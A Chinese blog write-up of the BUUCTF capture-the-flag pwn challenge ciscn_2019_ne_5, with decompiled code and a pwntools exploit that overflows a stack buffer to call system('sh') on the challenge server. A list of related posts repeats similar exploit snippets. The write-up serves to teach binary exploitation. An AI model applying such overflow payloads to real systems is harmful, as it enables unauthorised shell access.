[BUUCTF-pwn]——ciscn_2019_ne_5

最新推荐文章于 2023-04-09 16:35:13 发布
最新推荐文章于 2023-04-09 16:35:13 发布
阅读量421 收藏 1
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113791933
版权

[BUUCTF-pwn]——ciscn_2019_ne_5

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // [esp+0h] [ebp-100h]
  char src[4]; // [esp+4h] [ebp-FCh]
  char v5; // [esp+8h] [ebp-F8h]
  char s1[4]; // [esp+84h] [ebp-7Ch]
  char v7; // [esp+88h] [ebp-78h]
  char *v8; // [esp+E8h] [ebp-18h]
  int *v9; // [esp+ECh] [ebp-14h]
  int *v10; // [esp+F4h] [ebp-Ch]

  v10 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(&v7, 0, 0x60u);
  *(_DWORD *)src = 48;
  memset(&v5, 0, 0x7Cu);
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf();
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  while ( 1 )
  {
    puts("Input your operation:");
    puts("1.Add a log.");
    puts("2.Display all logs.");
    puts("3.Print all logs.");
    printf("0.Exit\n:");
    v9 = &v3;
    v8 = "%d";
    __isoc99_scanf();
    switch ( v3 )
    {
      case 0:
        exit(0);
        return;
      case 1:
        v8 = src;
        AddLog();
        break;
      case 2:
        Display(src);
        break;
      case 3:
        Print();
        break;
      case 4:
        GetFlag(src);
        break;
      default:
        continue;
    }
  }
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
由于最开始的反汇编失败,反汇编的代码可能与实际有些许出入,应该就是反汇编失败的地方,__isoc99_scanf() 函数. 通过验证得到第一个是给s1赋值,第二个是给v3赋值;AddLog()函数里面的应该是给src赋值

思路也就出来了: 在1选项中AddLog()给src赋值, 然后,在4选项,通过strcpy给dest赋值,进行栈溢出的利用.
查看一下,有没有可以利用的字符串,毕竟已经找到了system函数
在这里插入图片描述
发现了 ‘sh’ 字符

exploit

from pwn import *
context.os='linux'
context.arch='i386'
context.log_level='debug'
p = remote("node3.buuoj.cn",25035)
sh_addr = 0x080482ea
system_addr = 0x080486B9
p.sendlineafter("Please input admin password:",'administrator')
p.sendlineafter("0.Exit\n:",'1')
payload = 'a'*(0x48+0x4)+p32(system_addr)+p32(sh_addr)

p.sendlineafter("Please input new log info:",payload)
p.sendlineafter("0.Exit\n:",'4')

p.interactive()
Y-peak
关注
专栏目录
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 679
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 591
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2163
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 234
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1715
buuctf ciscn_2019_ne_5题目分析
BUUCTF-Pwn-ciscn_2019_ne_5
餐桌上的猫
03-25 148
exp from pwn import* elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5') p=remote('node4.buuoj.cn',28555) str_sh=0x80482EA system_plt=elf.plt['system'] p.sendline(b'administrator') p.sendline(b'1') payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh) p.sendline(
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 600
ciscn_2019_ne_5 BUUCTF
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4117
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 849
[buuctf]ciscn_2019_n_5
BUUCTF pwn——ciscn_2019_ne_5
最新发布
CNS-Enterprise BCC-1701-J
04-09 169
BUUCTF 做题练习
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1113
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 208
BUUCTFPWNciscn_2019_ne_5
BUUCTF pwn——ciscn_2019_n_5
CNS-Enterprise BCC-1701-J
04-07 232
BUUCTF 做题练习
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 634
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 369
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 831
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值